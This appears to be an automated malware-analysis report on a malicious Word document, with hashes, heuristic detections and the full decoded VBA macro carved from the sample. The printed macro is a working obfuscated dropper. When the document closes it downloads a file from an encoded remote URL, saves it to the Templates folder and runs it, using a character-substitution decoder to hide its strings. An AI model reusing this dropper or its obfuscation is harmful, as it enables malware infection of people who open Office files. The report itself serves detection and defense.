Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 f371bdd898a0b4df…

MALICIOUS

Office (OLE) / .DOC

Size: 127.2 KB
Created: 2025-11-29 23:18:00
Authoring application: Microsoft Office Word
First seen: 2026-06-16
MD5: 7e59fcf3fb579db4f9a13050db312fa6
SHA-1: f18c21811f5470d39b3ba0e689b48eec07211dbf
SHA-256: f371bdd898a0b4df2121ebdd11fede889060906de0cd75aebba3c9ebfea6b2da
Risk Score: 242

Heuristics (7)

  • VBA macros detected | medium | 3 related findings | OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage | critical | OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set WshShell = CreateObject("WScript.Shell")
  • VBA downloads and writes a file to disk | critical | OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    ¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª· = ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º.responseBody
  • CreateObject call | high | OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set WshShell = CreateObject("WScript.Shell")
  • Reference to Windows Script Host | high | SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Macro/content-enable lure | medium | SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL | info | EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24725 bytes
SHA-256: f4454dabcc7a7807ade4181b862a40ffef8f91ea8108e4941254e32e42446a42
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Dim ¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬ As Integer
¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬ = Chr(50) + Chr(48) + Chr(48)
  Dim WshShell As Object
    Dim oSpecialPathnhbjkj As String

    Set WshShell = CreateObject("WScript.Shell")
    oSpecialPathnhbjkj = WshShell.SpecialFolders("Templates")
Dim «¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°
Dim ¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·
Dim ©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸
Dim º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦
Dim ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³
Dim ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ As Integer
Dim ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º
Dim ¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿
¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ = 1




Set ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º = CreateObject("microsoft.xmlhttp")
Set ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ = CreateObject("Shell.Application")

º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ = oSpecialPathnhbjkj + ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´("\å¶ãKK§Ú.ÂÛÂ")
ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º.Open "get", ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´("hÖÖÓ://ÓÂÀÁÂzÒÅÂÃlÒw.ÜdÅÕ.ÂÙ/mbÄÅÄgbÀÂÖ/ÕwÒÅdbdb.ÂÛÂ"), False
ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º.send
¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª· = ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º.responseBody
If ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º.Status = 200 Then
Set «¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼° = CreateObject("adodb.stream")
«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°.Open
«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°.Type = ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨
«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°.Write ¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·
«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°.SaveToFile º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦, ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ + ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨
«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°.Close
End If
¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³.Open (º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦)
End Sub

    Public Function ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´(ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦)
        ¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³ = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãä娶§Ú¥"
        ¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹ = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNضQR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
        For i = 1 To Len(ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦)
            º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ = InStr(¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³, Mid(ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦, i, 1))
            If º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ > 0 Then
                ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸ = Mid(¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹, º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ, 1)
                ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« = ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« + ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸
            Else
                ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« = ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« + Mid(ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦, i, 1)
            End If
        Next
        ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ = ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«
    End Function
